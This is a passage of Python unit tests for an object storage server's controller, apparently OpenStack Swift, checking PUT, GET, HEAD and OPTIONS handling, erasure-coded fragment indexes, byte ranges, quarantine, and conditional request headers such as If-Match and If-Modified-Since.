resp.body
self.assertIn("Invalid EC metadata", str(ctx.exception))
# nothing is logged on *our* loggers
errors = self.object_controller.logger.get_lines_for_level('error')
self.assertEqual(errors, [])
# get EC frag archive - it's gone
req = Request.blank('/sda1/p/a/c/o', headers={
'X-Backend-Storage-Policy-Index': int(policy),
})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
def test_PUT_ssync_multi_frag(self):
timestamp = utils.Timestamp(time()).internal
def put_with_index(expected_rsp, frag_index, node_index=None):
data_file_tail = '#%d#d.data' % frag_index
headers = {'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'X-Backend-Ssync-Frag-Index': node_index,
'X-Object-Sysmeta-Ec-Frag-Index': frag_index,
'X-Backend-Storage-Policy-Index': int(policy)}
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(
resp.status_int, expected_rsp,
'got %s != %s for frag_index=%s node_index=%s' % (
resp.status_int, expected_rsp,
frag_index, node_index))
if expected_rsp == 409:
return
obj_dir = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(int(policy)),
'p', hash_path('a', 'c', 'o')))
data_file = os.path.join(obj_dir, timestamp) + data_file_tail
self.assertTrue(os.path.isfile(data_file),
'Expected file %r not found in %r for policy %r'
% (data_file, os.listdir(obj_dir), int(policy)))
for policy in POLICIES:
if policy.policy_type == EC_POLICY:
# upload with a ec-frag-index
put_with_index(201, 3)
# same timestamp will conflict a different ec-frag-index
put_with_index(409, 2)
# but with the ssync-frag-index (primary node) it will just
# save both!
put_with_index(201, 2, 2)
# but even with the ssync-frag-index we can still get a
# timestamp collisison if the file already exists
put_with_index(409, 3, 3)
# FWIW, ssync will never send in-consistent indexes - but if
# something else did, from the object server perspective ...
# ... the ssync-frag-index is canonical on the
# read/pre-existance check
put_with_index(409, 7, 2)
# ... but the ec-frag-index is canonical when it comes to on
# disk file
put_with_index(201, 7, 6)
def test_PUT_commits_data(self):
for policy in POLICIES:
timestamp = utils.Timestamp(int(time())).internal
data_file_tail = '.data'
headers = {'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'X-Backend-Storage-Policy-Index': int(policy)}
if policy.policy_type == EC_POLICY:
# commit renames data file
headers['X-Object-Sysmeta-Ec-Frag-Index'] = '2'
data_file_tail = '#2#d.data'
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
obj_dir = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(int(policy)),
'p', hash_path('a', 'c', 'o')))
data_file = os.path.join(obj_dir, timestamp) + data_file_tail
self.assertTrue(os.path.isfile(data_file),
'Expected file %r not found in %r for policy %r'
% (data_file, os.listdir(obj_dir), int(policy)))
rmtree(obj_dir)
def test_HEAD(self):
# Test swift.obj.server.ObjectController.HEAD
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertFalse('X-Backend-Timestamp' in resp.headers)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.content_length, 6)
self.assertEqual(resp.content_type, 'application/x-test')
self.assertEqual(resp.headers['content-type'], 'application/x-test')
self.assertEqual(
resp.headers['last-modified'],
strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
self.assertEqual(resp.headers['etag'],
'"0b4c12d7e0a73840c1c4f148fda3b037"')
self.assertEqual(resp.headers['x-object-meta-1'], 'One')
self.assertEqual(resp.headers['x-object-meta-two'], 'Two')
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
os.unlink(objfile)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-length': '6'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
utils.Timestamp(timestamp).internal)
def test_HEAD_quarantine_zbyte(self):
# Test swift.obj.server.ObjectController.GET
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
policy=POLICIES.legacy)
disk_file.open()
file_name = os.path.basename(disk_file._data_file)
with open(disk_file._data_file) as fp:
metadata = diskfile.read_metadata(fp)
os.unlink(disk_file._data_file)
with open(disk_file._data_file, 'w') as fp:
diskfile.write_metadata(fp, metadata)
file_name = os.path.basename(disk_file._data_file)
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(disk_file._data_file)))
self.assertEqual(os.listdir(quar_dir)[0], file_name)
def test_OPTIONS(self):
conf = {'devices': self.testdir, 'mount_check': 'false'}
server_handler = object_server.ObjectController(
conf, logger=debug_logger())
req = Request.blank('/sda1/p/a/c/o', {'REQUEST_METHOD': 'OPTIONS'})
req.content_length = 0
resp = server_handler.OPTIONS(req)
self.assertEqual(200, resp.status_int)
for verb in 'OPTIONS GET POST PUT DELETE HEAD REPLICATE \
SSYNC'.split():
self.assertTrue(
verb in resp.headers['Allow'].split(', '))
self.assertEqual(len(resp.headers['Allow'].split(', ')), 8)
self.assertEqual(resp.headers['Server'],
(server_handler.server_type + '/' + swift_version))
def test_GET(self):
# Test swift.obj.server.ObjectController.GET
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertFalse('X-Backend-Timestamp' in resp.headers)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, 'VERIFY')
self.assertEqual(resp.content_length, 6)
self.assertEqual(resp.content_type, 'application/x-test')
self.assertEqual(resp.headers['content-length'], '6')
self.assertEqual(resp.headers['content-type'], 'application/x-test')
self.assertEqual(
resp.headers['last-modified'],
strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
self.assertEqual(resp.headers['etag'],
'"0b4c12d7e0a73840c1c4f148fda3b037"')
self.assertEqual(resp.headers['x-object-meta-1'], 'One')
self.assertEqual(resp.headers['x-object-meta-two'], 'Two')
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
req.range = 'bytes=1-3'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'ERI')
self.assertEqual(resp.headers['content-length'], '3')
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
req.range = 'bytes=1-'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'ERIFY')
self.assertEqual(resp.headers['content-length'], '5')
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
req.range = 'bytes=-2'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'FY')
self.assertEqual(resp.headers['content-length'], '2')
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
os.unlink(objfile)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application:octet-stream',
'Content-Length': '6'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
utils.Timestamp(timestamp).internal)
def test_GET_if_match(self):
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
etag = resp.etag
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'GET'},
headers={'If-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Match': '"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Match': '"11111111111111111111111111111111"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={
'If-Match': '"11111111111111111111111111111111", "%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={
'If-Match':
'"11111111111111111111111111111111", '
'"22222222222222222222222222222222"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
def test_GET_if_match_etag_is_at(self):
headers = {
'X-Timestamp': utils.Timestamp(time()).internal,
'Content-Type': 'application/octet-stream',
'X-Object-Meta-Xtag': 'madeup',
'X-Object-Sysmeta-Xtag': 'alternate madeup',
}
req = Request.blank('/sda1/p/a/c/o', method='PUT',
headers=headers)
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
real_etag = resp.etag
# match x-backend-etag-is-at
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup',
'X-Backend-Etag-Is-At': 'X-Object-Meta-Xtag'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# match x-backend-etag-is-at, using first in list of alternates
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup',
'X-Backend-Etag-Is-At':
'X-Object-Meta-Xtag,X-Object-Sysmeta-Z'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# match x-backend-etag-is-at, using second in list of alternates
alts = 'X-Object-Sysmeta-Y,X-Object-Meta-Xtag,X-Object-Sysmeta-Z'
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup',
'X-Backend-Etag-Is-At': alts})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# match x-backend-etag-is-at, choosing first of multiple alternates
alts = 'X-Object-Sysmeta-Y,X-Object-Meta-Xtag,X-Object-Sysmeta-Xtag'
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup',
'X-Backend-Etag-Is-At': alts})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# match x-backend-etag-is-at, choosing first of multiple alternates
# (switches order of second two alternates from previous assertion)
alts = 'X-Object-Sysmeta-Y,X-Object-Sysmeta-Xtag,X-Object-Meta-Xtag'
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'alternate madeup',
'X-Backend-Etag-Is-At': alts})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# no match x-backend-etag-is-at
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': real_etag,
'X-Backend-Etag-Is-At': 'X-Object-Meta-Xtag'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
# etag-is-at metadata doesn't exist, default to real etag
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': real_etag,
'X-Backend-Etag-Is-At': 'X-Object-Meta-Missing'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# sanity no-match with no etag-is-at
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
# sanity match with no etag-is-at
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': real_etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# sanity with no if-match
req = Request.blank('/sda1/p/a/c/o', headers={
'X-Backend-Etag-Is-At': 'X-Object-Meta-Xtag'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
def test_HEAD_if_match(self):
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
etag = resp.etag
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Match': '"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Match': '"11111111111111111111111111111111"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={
'If-Match': '"11111111111111111111111111111111", "%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={
'If-Match':
'"11111111111111111111111111111111", '
'"22222222222222222222222222222222"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
def test_GET_if_none_match(self):
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(time()),
'X-Object-Meta-Soup': 'gazpacho',
'Content-Type': 'application/fizzbuzz',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
etag = resp.etag
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
self.assertEqual(resp.headers['Content-Type'], 'application/fizzbuzz')
self.assertEqual(resp.headers['X-Object-Meta-Soup'], 'gazpacho')
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match': '"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match': '"11111111111111111111111111111111"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match':
'"11111111111111111111111111111111", '
'"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
def test_HEAD_if_none_match(self):
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
etag = resp.etag
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match': '"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match': '"11111111111111111111111111111111"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match':
'"11111111111111111111111111111111", '
'"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
def test_GET_if_modified_since(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) - 1))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
since = resp.headers['Last-Modified']
self.assertEqual(since, strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
timestamp = normalize_timestamp(int(time()))
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp)))
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'GET'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
def test_HEAD_if_modified_since(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) - 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
since = resp.headers['Last-Modified']
self.assertEqual(since, strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = self.object_controller.GET(req)
self.assertEqual(resp.status_int, 304)
timestamp = normalize_timestamp(int(time()))
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp)))
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
def test_GET_if_unmodified_since(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'X-Object-Meta-Burr': 'ito',
'Content-Type': 'application/cat-picture',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) - 9))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
self.assertEqual(resp.headers['Content-Type'],
'application/cat-picture')
self.assertEqual(resp.headers['X-Object-Meta-Burr'], 'ito')
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) + 9))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
since = resp.headers['Last-Modified']
self.assertEqual(since, strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
def test_HEAD_if_unmodified_since(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)) + 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp))))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)) - 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
def assertECBodyEqual(self, resp, expected):
# we pull the policy index from the request environ since it seems to
# be missing from the response headers
policy_index = int(
resp.request.headers['X-Backend-Storage-Policy-Index'])
policy = POLICIES[policy_index]
frags = encode_frag_archive_bodies(policy, expected)
